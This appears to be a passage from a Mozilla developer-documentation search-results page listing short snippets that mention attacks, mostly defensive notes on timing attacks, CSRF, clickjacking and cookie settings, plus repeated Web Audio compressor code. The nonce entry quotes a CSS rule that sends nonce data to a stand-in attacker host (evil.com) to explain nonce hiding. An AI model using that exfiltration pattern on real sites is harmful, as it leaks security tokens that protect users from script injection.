attack (cve-2018-12404) bug 1481271 - resend the same ticket in clienthello after helloretryrequest bug 1493769 - set session_id for external resumption tokens bug 1507179 - reject ccs after handshake is complete in tls 1.3 this bugzilla query returns all the bugs fixed in nss 3.41: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advan...
nss tech note7
to prevent denial-of-service
attacks with huge public keys, nss disallows modulus size greater than 8192 bits.
NSS environment variables
3.12 nss_ssl_cbc_random_iv string ("0", "1") controls the workaround for the beast
attack on ssl 3.0 and tls 1.0.
sslintro.html
specifies a callback function used to authenticate an incoming certificate (optional for servers, necessary for clients to avoid "man-in-the-middle"
attacks).
Zest tools
the following tools currently support zest: owasp zed
attack proxy the zap add-on allows the user to create, edit and run zest scripts.
Components.utils.Sandbox
if the sandbox interacts with untrusted content this should be set to false when possible to further reduce possible
attack surface.
nsIURI
this is useful for authentication, managing sessions, or for checking the origin of an uri to prevent cross-site scripting
attacks while using methods such as window.postmessage().
Setting HTTP request headers
by not advertising to all sites what extensions are installed this improves both privacy (this makes it harder to track a user known by his set of plugins, addons and extensions) and security (some plugins, addons and extensions may be known to have flaws by
attackers).
Storage
by binding the parameters, you prevent possible sql injection
attacks since a bound parameter can never be executed as sql.
Debugger-API - Firefox Developer Tools
by design, it ought not to introduce security holes, so in principle it could be made available to content as well; but it is hard to justify the security risks of the additional
attack surface.
Cookies - Firefox Developer Tools
same-site cookies allow servers to mitigate the risk of csrf and information leakage
attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.
Animation.currentTime - Web APIs
her animation's currenttime to half her keyframeeffect's duration: alicechange.currenttime = alicechange.effect.timing.duration / 2; a more generic means of seeking to the 50% mark of an animation would be: animation.currenttime = animation.effect.getcomputedtiming().delay + animation.effect.getcomputedtiming().activeduration / 2; reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of animation.currenttime might get rounded depending on browser settings.
Animation.startTime - Web APIs
waapicats.appendchild(newcat); } reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of animation.starttime might get rounded depending on browser settings.
AnimationTimeline.currentTime - Web APIs
reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of animationtimeline.currenttime might get rounded depending on browser settings.
AudioParam - Web APIs
var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); specifications specification status comment web audio apithe definition of 'audioparam' in that specification.
BaseAudioContext.createDynamicsCompressor() - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
BaseAudioContext.currentTime - Web APIs
console.log(audioctx.currenttime); reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of audioctx.currenttime might get rounded depending on browser settings.
Constraint validation API - Web APIs
even though client-side validation can prevent many common kinds of invalid values, invalid ones can still be sent by older browsers or by
attackers trying to trick your web application.
DynamicsCompressorNode.knee - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.ratio - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.release - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
DynamicsCompressorNode.threshold - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.
attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...
Event.timeStamp - Web APIs
</p> <p>timestamp: <span id="time">-</span></p> javascript function gettime(event) { var time = document.getelementbyid("time"); time.firstchild.nodevalue = event.timestamp; } document.body.addeventlistener("keypress", gettime); result reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of event.timestamp might get rounded depending on browser settings.
File.lastModified - Web APIs
const filewithdate = new file([], 'file.bin', { lastmodified: new date(2017, 1, 1), }); console.log(filewithdate.lastmodified); //returns 1485903600000 const filewithoutdate = new file([], 'file.bin'); console.log(filewithoutdate.lastmodified); //returns current time reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of somefile.lastmodified might get rounded depending on browser settings.
File.lastModifiedDate - Web APIs
ut is a htmlinputelement: <input type="file" multiple id="myfileinput"> var fileinput = document.getelementbyid("myfileinput"); // files is a filelist object (simliar to nodelist) var files = fileinput.files; for (var i = 0; i < files.length; i++) { alert(files[i].name + " has a last modified date of " + files[i].lastmodifieddate); } reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of somefile.lastmodifieddate.gettime() might get rounded depending on browser settings.
HTMLMediaElement.currentTime - Web APIs
example var video = document.createelement('video'); console.log(video.currenttime); usage notes reduced time precision to offer protection against timing
attacks and fingerprinting, browsers may round or otherwise adjust the value returned by currenttime.
HTMLOrForeignElement.nonce - Web APIs
nonce hiding helps preventing that
attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this: script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); } specifications specification html living standardthe definition of 'nonce' in that specification.
Pbkdf2Params - Web APIs
in this context, slow is good, since it makes it more expensive for an
attacker to run a dictionary
attack against the keys.
Push API - Web APIs
see the following articles for more information: cross-site request forgery (csrf) prevention cheat sheet preventing csrf and xsrf
attacks for an app to receive push messages, it has to have an active service worker.
RTCIceCandidate.usernameFragment - Web APIs
this avoids crosstalk among multiple ongoing ice sessions, but, more importantly, helps secure ice transactions (and all of webrtc by extension) against
attacks that might try to inject themselves into an ice exchange.
SubtleCrypto.deriveKey() - Web APIs
the more times the process is repeated, the more computationally expensive key derivation is: this makes it harder for an
attacker to use brute-force to discover the key using a dictionary
attack.
Geometry and reference spaces in WebXR - Web APIs
const radians_per_degree = math.pi / 180.0; let degreestoradians = (deg) => deg * radians_per_degree; let radianstodegrees = (rad) => rad / radians_per_degree; times and durations note that for security reasons, domhighrestimestamp usually introduces a small amount of imprecision to the clock in order to prevent it from being used in fingerprinting and timing-based
attacks.
Web Authentication API - Web APIs
this resolves significant security problems related to phishing, data breaches, and
attacks against sms texts or other second-factor authentication methods while at the same time significantly increasing ease of use (since users don't have to manage dozens of increasingly complicated passwords).
Window.crypto - Web APIs
although the property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to
attack by polyfill.
@document - CSS: Cascading Style Sheets
this has been limited to use only in user and ua sheets in firefox 59 in nightly and beta — an experiment designed to mitigate potential css injection
attacks (see bug 1035091).
HTML5 Parser - Developer guides
if an
attacker could force a premature end-of-file, the parser might change which parts of the document it considered to be executable scripts.
HTTP authentication - HTTP
from firefox 59 onwards, image resources loaded from different origins to the current document are no longer able to trigger http authentication dialogs (bug 1423146), preventing user credentials being stolen if
attackers were able to embed an arbitrary image into a third-party page.
Cross-Origin Resource Policy (CORP) - HTTP
cross-origin resource policy is a policy set by the cross-origin-resource-policy http header that lets web sites and applications opt in to protection against certain requests from other origins (such as those issued with elements like <script> and <img>), to mitigate speculative side-channel
attacks, like spectre, as well as cross-site script inclusion
attacks.
Public-Key-Pins - HTTP
the http public-key-pins response header used to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm
attacks with forged certificates, however, it has been removed from modern browsers and is no longer supported.
Server - HTTP
avoid overly-detailed server values, as they can reveal information that might make it (slightly) easier for
attackers to exploit known security holes.
SameSite cookies - HTTP
none used to be the default value, but recent browser versions made lax the default value to have reasonably robust defense against some classes of cross-site request forgery (csrf)
attacks.
X-Frame-Options - HTTP
sites can use this to avoid click-jacking
attacks, by ensuring that their content is not embedded into other sites.
414 URI Too Long - HTTP
there are a few rare conditions when this might occur: when a client has improperly converted a post request to a get request with long query information, when the client has descended into a loop of redirection (for example, a redirected uri prefix that points to a suffix of itself), or when the server is under
attack by a client attempting to exploit potential security holes.
425 Too Early - HTTP
the hypertext transfer protocol (http) 425 too early response status code indicates that the server is unwilling to risk processing a request that might be replayed, which creates the potential for a replay
attack.
Grammar and types - JavaScript
(this is similar to string interpolation features in perl, python, and more.) optionally, a tag can be added to allow the string construction to be customized, avoiding injection
attacks, or constructing higher-level data structures from string contents.
Date.prototype.getTime() - JavaScript
reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of new date().gettime() might get rounded depending on browser settings.
Date.now() - JavaScript
engines which have not been updated to support this method can work around the absence of this method using the following shim: if (!date.now) { date.now = function now() { return new date().gettime(); }; } examples reduced time precision to offer protection against timing
attacks and fingerprinting, the precision of date.now() might get rounded depending on browser settings.
SharedArrayBuffer - JavaScript
for top-level documents, two headers will need to be set to cross-origin isolate your site: cross-origin-opener-policy with same-origin as value (protects your origin from
attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
eval() - JavaScript
more importantly, a third-party code can see the scope in which eval() was invoked, which can lead to possible
attacks in ways to which the similar function is not susceptible.